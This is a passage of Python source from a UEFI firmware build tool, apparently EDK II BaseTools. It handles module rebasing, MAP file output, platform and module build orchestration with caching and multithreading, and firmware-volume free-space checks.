ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.append('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
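    # Illustrative sketch (hypothetical sizes): with PeiSize=0x20000, BtSize=0x100000
    # and RtSize=0x40000 the page-number lines above become
    #   PEI_CODE_PAGE_NUMBER = 0x20
    #   BOOT_CODE_PAGE_NUMBER = 0x100
    #   RUNTIME_CODE_PAGE_NUMBER = 0x40
    # and, for a TopMemoryAddress of 0x1000000, the rebase bases are
    #   PeiBaseAddr = 0x1000000 - 0x40000 - 0x100000 = 0xEC0000
    #   BtBaseAddr  = 0x1000000 - 0x40000            = 0xFC0000
    #   RtBaseAddr  = 0x1000000 - ReservedRuntimeMemorySize (0 here) = 0x1000000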
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
        # Compose the map file path.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
for Arch in Wa.ArchList:
PcdMaList = []
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
PcdMaList.append(Ma)
self.BuildModules.append(Ma)
Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict,PcdMaList=PcdMaList)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
self.CreateGuidedSectionToolsFile(Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
GlobalData.file_lock = mp.Lock()
GlobalData.FfsCmd = CmdListDict
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
MaList.append(Ma)
if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
if Ma.CanSkipbyPreMakeCache():
continue
else:
self.PreMakeCacheMiss.add(Ma)
                            # Do not run AutoGen for the 'clean', 'cleanlib', 'cleanall', 'run', and 'fds' targets
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.Path, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.Path, Arch])
del CmdListDict[Module.Path, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
if Ma.CanSkipbyMakeCache():
continue
else:
self.MakeCacheMiss.add(Ma)
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # In case there's an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self,ArchList):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
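    # Illustrative sketch (hypothetical data): _GenFfsCmd inverts the mapping
    # returned by GenFds.GenFfsMakefile, for example
    #   {'cmd1': ('MyPkg/MyDriver.inf', 'X64'), 'cmd2': ('MyPkg/MyDriver.inf', 'X64')}
    # becomes
    #   {('MyPkg/MyDriver.inf', 'X64'): {'cmd1', 'cmd2'}}
    # so all FFS commands for one (INF, Arch) pair can be attached to that module's
    # makefile.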
def VerifyAutoGenFiles(self):
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
try:
with open(AutoGenIdFile) as fd:
lines = fd.readlines()
except:
return None
for line in lines:
if "Arch" in line:
ArchList = line.strip().split("=")[1].split("|")
if "BuildDir" in line:
BuildDir = line.split("=")[1].strip()
if "PlatformGuid" in line:
PlatformGuid = line.split("=")[1].strip()
GlobalVarList = []
for arch in ArchList:
global_var = os.path.join(BuildDir, "GlobalVar_%s_%s.bin" % (str(PlatformGuid),arch))
if not os.path.exists(global_var):
return None
GlobalVarList.append(global_var)
for global_var in GlobalVarList:
data_pipe = MemoryDataPipe()
data_pipe.load(global_var)
target = data_pipe.Get("P_Info").get("Target")
toolchain = data_pipe.Get("P_Info").get("ToolChain")
archlist = data_pipe.Get("P_Info").get("ArchList")
Arch = data_pipe.Get("P_Info").get("Arch")
active_p = data_pipe.Get("P_Info").get("ActivePlatform")
workspacedir = data_pipe.Get("P_Info").get("WorkspaceDir")
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(workspacedir, PackagesPath)
LibraryBuildDirectoryList = data_pipe.Get("LibraryBuildDirectoryList")
ModuleBuildDirectoryList = data_pipe.Get("ModuleBuildDirectoryList")
for m_build_dir in LibraryBuildDirectoryList:
if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
return None
for m_build_dir in ModuleBuildDirectoryList:
if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
return None
Wa = WorkSpaceInfo(
workspacedir,active_p,target,toolchain,archlist
)
Pa = PlatformInfo(Wa, active_p, target, toolchain, Arch,data_pipe)
Wa.AutoGenObjectList.append(Pa)
return Wa
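    # Illustrative sketch (hypothetical content): VerifyAutoGenFiles expects a
    # .AutoGenIdFile.txt written by a previous AutoGen pass, roughly
    #   Arch=IA32|X64
    #   BuildDir=/abs/path/Build/MyPlatform/DEBUG_GCC5
    #   PlatformGuid=aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee
    # plus one GlobalVar_<PlatformGuid>_<Arch>.bin data pipe per listed arch and the
    # per-module makefiles; if any piece is missing it returns None and the caller
    # falls back to a full AutoGen pass.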
def SetupMakeSetting(self,Wa):
BuildModules = []
for Pa in Wa.AutoGenObjectList:
for m in Pa._MbList:
ma = ModuleAutoGen(Wa,m.MetaFile, Pa.BuildTarget, Wa.ToolChain, Pa.Arch, Pa.MetaFile,Pa.DataPipe)
BuildModules.append(ma)
fdf_file = Wa.FlashDefinition
if fdf_file:
Fdf = FdfParser(fdf_file.Path)
Fdf.ParseFile()
GlobalData.gFdfParser = Fdf
if Fdf.CurrentFdName and Fdf.CurrentFdName in Fdf.Profile.FdDict:
FdDict = Fdf.Profile.FdDict[Fdf.CurrentFdName]
for FdRegion in FdDict.RegionList:
if str(FdRegion.RegionType) == 'FILE' and self.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
if int(FdRegion.Offset) % 8 != 0:
EdkLogger.error("build", FORMAT_INVALID, 'The VPD Base Address %s must be 8-byte aligned.' % (FdRegion.Offset))
Wa.FdfProfile = Fdf.Profile
self.Fdf = Fdf
else:
self.Fdf = None
return BuildModules
## Build a platform in multi-thread mode
#
def PerformAutoGen(self,BuildTarget,ToolChain):
WorkspaceAutoGenTime = time.time()
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
BuildModules = []
for Arch in Wa.ArchList:
PcdMaList = []
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
Pa.DataPipe.DataContainer = {"CommandTarget": self.Target}
Pa.CreateLibModuelDirs()
# Fetch the MakeFileName.
self.MakeFileName = Pa.MakeFileName
if not self.MakeFileName:
self.MakeFileName = Pa.MakeFile
Pa.DataPipe.DataContainer = {"LibraryBuildDirectoryList":Pa.LibraryBuildDirectoryList}
Pa.DataPipe.DataContainer = {"ModuleBuildDirectoryList":Pa.ModuleBuildDirectoryList}
Pa.DataPipe.DataContainer = {"FdsCommandDict": Wa.GenFdsCommandDict}
# Prepare the cache share data for multiprocessing
Pa.DataPipe.DataContainer = {"gPlatformHashFile":GlobalData.gPlatformHashFile}
ModuleCodaFile = {}
for ma in Pa.ModuleAutoGenList:
ModuleCodaFile[(ma.MetaFile.File,ma.MetaFile.Root,ma.Arch,ma.MetaFile.Path)] = [item.Target for item in ma.CodaTargetList]
Pa.DataPipe.DataContainer = {"ModuleCodaFile":ModuleCodaFile}
# ModuleList contains all driver modules only
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
PcdMaList.append(Ma)
self.AllDrivers.add(Ma)
self.AllModules.add(Ma)
mqueue = mp.Queue()
cqueue = mp.Queue()
for m in Pa.GetAllModuleInfo:
mqueue.put(m)
module_file,module_root,module_path,module_basename,\
module_originalpath,module_arch,IsLib = m
Ma = ModuleAutoGen(Wa, PathClass(module_path, Wa), BuildTarget,\
ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
self.AllModules.add(Ma)
data_pipe_file = os.path.join(Pa.BuildDir, "GlobalVar_%s_%s.bin" % (str(Pa.Guid),Pa.Arch))
Pa.DataPipe.dump(data_pipe_file)
mqueue.put((None,None,None,None,None,None,None))
autogen_rt, errorcode = self.StartAutoGen(mqueue, Pa.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
if not autogen_rt:
self.AutoGenMgr.TerminateWorkers()
self.AutoGenMgr.join(1)
raise FatalError(errorcode)
if GlobalData.gUseHashCache:
for item in GlobalData.gModuleAllCacheStatus:
(MetaFilePath, Arch, CacheStr, Status) = item
Ma = ModuleAutoGen(Wa, PathClass(MetaFilePath, Wa), BuildTarget,\
ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if CacheStr == "PreMakeCache" and Status == False:
self.PreMakeCacheMiss.add(Ma)
if CacheStr == "PreMakeCache" and Status == True:
self.PreMakeCacheHit.add(Ma)
GlobalData.gModuleCacheHit.add(Ma)
if CacheStr == "MakeCache" and Status == False:
self.MakeCacheMiss.add(Ma)
if CacheStr == "MakeCache" and Status == True:
self.MakeCacheHit.add(Ma)
GlobalData.gModuleCacheHit.add(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
with open(AutoGenIdFile,"w") as fw:
fw.write("Arch=%s\n" % "|".join((Wa.ArchList)))
fw.write("BuildDir=%s\n" % Wa.BuildDir)
fw.write("PlatformGuid=%s\n" % str(Wa.AutoGenObjectList[0].Guid))
if GlobalData.gBinCacheSource:
BuildModules.extend(self.MakeCacheMiss)
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheDest:
BuildModules.extend(self.PreMakeCacheMiss)
else:
BuildModules.extend(self.AllDrivers)
self.Progress.Stop("done!")
return Wa, BuildModules
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
resetFdsGlobalVariable()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
ExitFlag = threading.Event()
ExitFlag.clear()
if self.SkipAutoGen:
Wa = self.VerifyAutoGenFiles()
if Wa is None:
self.SkipAutoGen = False
Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
else:
GlobalData.gAutoGenPhase = True
self.BuildModules = self.SetupMakeSetting(Wa)
else:
Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
Pa = Wa.AutoGenObjectList[0]
GlobalData.gAutoGenPhase = False
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache Summary]: Total module num: %s" % len(self.AllModules))
EdkLogger.quiet("[cache Summary]: PreMakecache miss num: %s " % len(self.PreMakeCacheMiss))
EdkLogger.quiet("[cache Summary]: Makecache miss num: %s " % len(self.MakeCacheMiss))
for Arch in Wa.ArchList:
MakeStart = time.time()
for Ma in set(self.BuildModules):
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # In case there's an interruption, we need a full version of the platform makefile
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
#
                # All modules have been put into the build task queue. Tell the task
                # scheduler to exit once all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
#
# Get Module List
#
ModuleList = {ma.Guid.upper(): ma for ma in self.BuildModules}
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = []
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
Threshold = self.GetFreeSizeThreshold()
if Threshold:
self.CheckFreeSizeThreshold(Threshold, Wa.FvDir)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
self.CreateGuidedSectionToolsFile(Wa)
## GetFreeSizeThreshold()
#
# @retval int Threshold value
#
def GetFreeSizeThreshold(self):
Threshold = None
Threshold_Str = GlobalData.gCommandLineDefines.get('FV_SPARE_SPACE_THRESHOLD')
if Threshold_Str:
try:
if Threshold_Str.lower().startswith('0x'):
Threshold = int(Threshold_Str, 16)
else:
Threshold = int(Threshold_Str)
except:
EdkLogger.warn("build", 'incorrect value for FV_SPARE_SPACE_THRESHOLD %s.Only decimal or hex format is allowed.' % Threshold_Str)
return Threshold
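    # Illustrative sketch: building with '-D FV_SPARE_SPACE_THRESHOLD=0x1000' yields
    # a Threshold of 4096 bytes, and '-D FV_SPARE_SPACE_THRESHOLD=4096' yields the
    # same value through the decimal branch.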
def CheckFreeSizeThreshold(self, Threshold=None, FvDir=None):
if not isinstance(Threshold, int):
return
if not isinstance(FvDir, str) or not FvDir:
return
FdfParserObject = GlobalData.gFdfParser
FvRegionNameList = [FvName for FvName in FdfParserObject.Profile.FvDict if FdfParserObject.Profile.FvDict[FvName].FvRegionInFD]
for FvName in FdfParserObject.Profile.FvDict:
if FvName in FvRegionNameList:
FvSpaceInfoFileName = os.path.join(FvDir, FvName.upper() + '.Fv.map')
if os.path.exists(FvSpaceInfoFileName):
FileLinesList = getlines(FvSpaceInfoFileName)
for Line in FileLinesList:
NameValue = Line.split('=')
if len(NameValue) == 2 and NameValue[0].strip() == 'EFI_FV_SPACE_SIZE':
FreeSizeValue = int(NameValue[1].strip(), 0)
if FreeSizeValue < Threshold:
EdkLogger.error("build", FV_FREESIZE_ERROR,
'%s FV free space %d is not enough to meet with the required spare space %d set by -D FV_SPARE_SPACE_THRESHOLD option.' % (
FvName, FreeSizeValue, Threshold))
break
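    # Illustrative sketch (hypothetical map content): CheckFreeSizeThreshold scans
    # each <FVNAME>.Fv.map for a line such as
    #   EFI_FV_SPACE_SIZE = 0x800
    # and reports an FV_FREESIZE_ERROR when that value (0x800 = 2048 bytes here) is
    # below the requested spare-space threshold.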
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self,Wa):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
guidList = []
tooldefguidList = []
guidAttribs = []
for Platform in Wa.AutoGenObjectList:
if Platform.BuildTarget != BuildTarget:
continue
if Platform.ToolChain != ToolChain:
continue
if Platform.Arch != Arch:
continue
if hasattr (Platform, 'BuildOption'):
for Tool in Platform.BuildOption:
if 'GUID' in Platform.BuildOption[Tool]:
if 'PATH' in Platform.BuildOption[Tool]:
value = Platform.BuildOption[Tool]['GUID']
if value in guidList:
EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in DSC [BuildOptions]." % (value, Tool))
path = Platform.BuildOption[Tool]['PATH']
guidList.append(value)
guidAttribs.append((value, Tool, path))
for Tool in Platform.ToolDefinition:
if 'GUID' in Platform.ToolDefinition[Tool]:
if 'PATH' in Platform.ToolDefinition[Tool]:
value = Platform.ToolDefinition[Tool]['GUID']
if value in tooldefguidList:
EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in tools_def.txt." % (value, Tool))
tooldefguidList.append(value)
if value in guidList:
# Already added by platform
continue
path = Platform.ToolDefinition[Tool]['PATH']
guidList.append(value)
guidAttribs.append((value, Tool, path))
# Sort by GuidTool name
guidAttribs = sorted (guidAttribs, key=lambda x: x[1])
                    # Write out GuidedSectionTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the real path of the tool.
#
def GetRealPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
return tool
## Launch the module or platform build
#
def Launch(self):
self.AllDrivers = set()
self.AllModules = set()
self.PreMakeCacheMiss = set()
self.PreMakeCacheHit = set()
self.MakeCacheMiss = set()
self.MakeCacheHit = set()
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
